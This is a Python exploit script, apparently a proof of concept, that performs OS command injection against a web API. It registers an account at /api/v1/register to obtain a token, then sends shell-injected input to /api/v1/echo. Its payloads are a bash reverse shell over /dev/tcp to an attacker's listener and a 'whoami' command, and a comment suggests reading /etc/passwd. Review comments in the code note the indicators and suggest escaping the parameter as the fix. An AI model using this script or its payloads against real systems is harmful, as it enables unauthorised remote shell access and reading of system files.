import sys
import argparse
import requests
# ASCII banner
# Printed by the entry point unless --no-banner is given; purely cosmetic.
banner = """
██╗ ██╗███╗ ██╗ ██████╗ ██████╗ ██╗
██║ ██║████╗ ██║██╔════╝ ╚════██╗███║
███████║██╔██╗ ██║███████╗ █████╔╝╚██║
╚════██║██║╚██╗██║██╔═══██╗ ╚═══██╗ ██║
██║██║ ╚████║╚██████╔╝██████╔╝ ██║
╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚═════╝ ╚═╝
"""
# ANSI escape codes for colors
# Console output is built as COLOR + text + RESET; RESET restores the terminal default.
GREEN = "\033[92m"
RED = "\033[91m"
BLUE = "\033[34m"
CYAN = "\033[96m"
RESET = "\033[0m"
# Example user
# Defaults for the JSON body that register_user() posts to /api/v1/register.
# NOTE(review): '[email protected]' looks like a scraped/obfuscated address rather than a
# deliberate default — confirm the intended value before relying on it.
default_email = '[email protected]' # Default email used for registration.
organization = 'Your Organization' # Default organization used for registration.
use_case = 'Example Use Case' # Default use case used for registration.
# Function to register a user
def register_user(target_ip: str, email: str = default_email, organization: str = organization, use_case: str = use_case):
    """Register a user on the target via ``/api/v1/register`` and return its API token.

    Sends an unauthenticated JSON POST with ``email``, ``organization`` and ``use_case``.
    On HTTP 200 the ``api_token`` field of the JSON response is returned (``None`` if the
    field is absent); on any other status the response body is printed in red and ``None``
    is returned. No exception handling is performed, so transport errors or a non-JSON
    200 body propagate to the caller.

    Args:
        target_ip: Address interpolated into ``http://{target_ip}/api/v1/register``.
        email: Email value placed in the registration body.
        organization: Organization value placed in the registration body.
        use_case: Use-case value placed in the registration body.

    Returns:
        The ``api_token`` value from the response JSON, or ``None`` on failure.
    """
    # Construct the URL for user registration
    url = f'http://{target_ip}/api/v1/register'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36',
        'Content-Type': 'application/json'
    }
    # User information for registration
    userinfo = {
        'user': {
            'email': email,
            'organization': organization,
            'use_case': use_case
        }
    }
    # Send a POST request to register the user
    response = requests.post(url, headers=headers, json=userinfo)
    # Check if registration was successful
    if response.status_code == 200:
        # Only the token is kept; the rest of the response body is discarded.
        return response.json().get('api_token')
    else:
        print(RED + f"Failed to register user: {response.text}" + RESET)
        return None
# Function to execute the payload
def execute_payload(target_ip: str, listener_ip: str, api_token: str, port: int = 4242, payload_type: str = 'reverseshell') -> str:
    """Send one of the predefined injection strings to ``/api/v1/echo`` and return the response body.

    The selected string is passed verbatim as the ``input`` query parameter of a GET request
    that carries the ``X-API-TOKEN`` header obtained from register_user(). Both branches
    below issue the same request and return the raw response text; they differ only in the
    console message printed beforehand.

    Args:
        target_ip: Address interpolated into ``http://{target_ip}/api/v1/echo``.
        listener_ip: Address embedded in the ``reverseshell`` payload string.
        api_token: Token returned by register_user(), sent as ``X-API-TOKEN``.
        port: Port embedded in the ``reverseshell`` payload string.
        payload_type: Key into ``payloads``; any unknown value falls back to ``reverseshell``.

    Returns:
        The response body text.

    NOTE(review): the indicators this client produces are an unauthenticated POST to
    /api/v1/register followed by a GET to /api/v1/echo whose ``input`` parameter begins
    with ';' and ends with '&' and which carries an X-API-TOKEN header. The server side is
    not visible here; presumably ``input`` reaches a shell unescaped — confirm against the
    server code, and treat allow-listing/escaping of that parameter as the fix.
    """
    # Construct the URL for executing the payload
    url = f'http://{target_ip}/api/v1/echo'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36',
        'Content-Type': 'application/json',
        'X-API-TOKEN': api_token
    }
    # Payload options
    payloads = {
        'reverseshell': f';(bash -c "bash -i >& /dev/tcp/{listener_ip}/{port} 0>&1") &',
        'basic': f';(whoami) &' # Can be replaced with any other commands like cat /etc/passwd'
    }
    # Select payload based on payload_type
    # dict.get with a default means an unrecognised payload_type silently becomes 'reverseshell'.
    payload = payloads.get(payload_type, payloads['reverseshell'])
    if payload_type == 'reverseshell':
        print(BLUE + "[*] Reverse shell Command injected. Check your listener." + RESET)
        # Send a GET request to execute the payload
        response = requests.get(url, headers=headers, params={'input': payload})
        return response.text
    else:
        # Recover the text between the leading ';' and the trailing '&' of the payload
        # purely for display (yields '(whoami)' for the 'basic' entry).
        command_executed = payload.split(';')[1].split('&')[0].strip()
        print(BLUE + f"[*] Executed command: {command_executed}" + RESET)
        # For basic command execution, directly return the response
        response = requests.get(url, headers=headers, params={'input': payload})
        return response.text
if __name__ == "__main__":
    # Argument Parser
    # --target_ip is the only required option; --payload is restricted by argparse to the
    # two keys defined in execute_payload(), so the dict fallback there is never hit from the CLI.
    parser = argparse.ArgumentParser(prog="exploit.py", description="A Python3 script to perform OS command injection and get a reverse shell.")
    parser.add_argument("--target_ip", help="IP address of the target like 10.x.50.x", required=True)
    parser.add_argument("--listener_ip", help="IP address of the listener", default="127.0.0.1")
    parser.add_argument("--listener_port", help="Port number of the listener", type=int, default=4242)
    parser.add_argument("--email", help="Email address for user registration", default=default_email)
    # The backslash continuation below is inside the help string literal; the line after it
    # must stay at column 0 so no extra whitespace is added to the help text.
    parser.add_argument("--payload", help="Type of payload to use (basic/reverseshell). The 'basic' payload allows users to execute basic commands like 'whoami', 'cat /etc/passwd', etc. Replace 'basic' with any desired command. \
The 'reverseshell' payload spawns a reverse shell to the specified listener IP and port.", default="reverseshell", choices=["basic", "reverseshell"])
    parser.add_argument("--no-banner", action="store_true", help="Do not print the banner")
    args = parser.parse_args()
    if not args.no_banner:
        print(CYAN + banner + RESET)
    # Register the user and obtain API token
    # Only --email is forwarded; organization and use_case keep their module-level defaults.
    api_token = register_user(args.target_ip, email=args.email)
    if api_token:
        print(GREEN + f"[+] User registered successfully. API token: {api_token}" + RESET)
        # Execute the payload to get a reverse shell
        response_text = execute_payload(args.target_ip, args.listener_ip, api_token, args.listener_port, args.payload)
        print(response_text)
    else:
        # register_user() has already printed the server's error body at this point.
        print(RED + "[!] User registration failed. Use a different email." + RESET)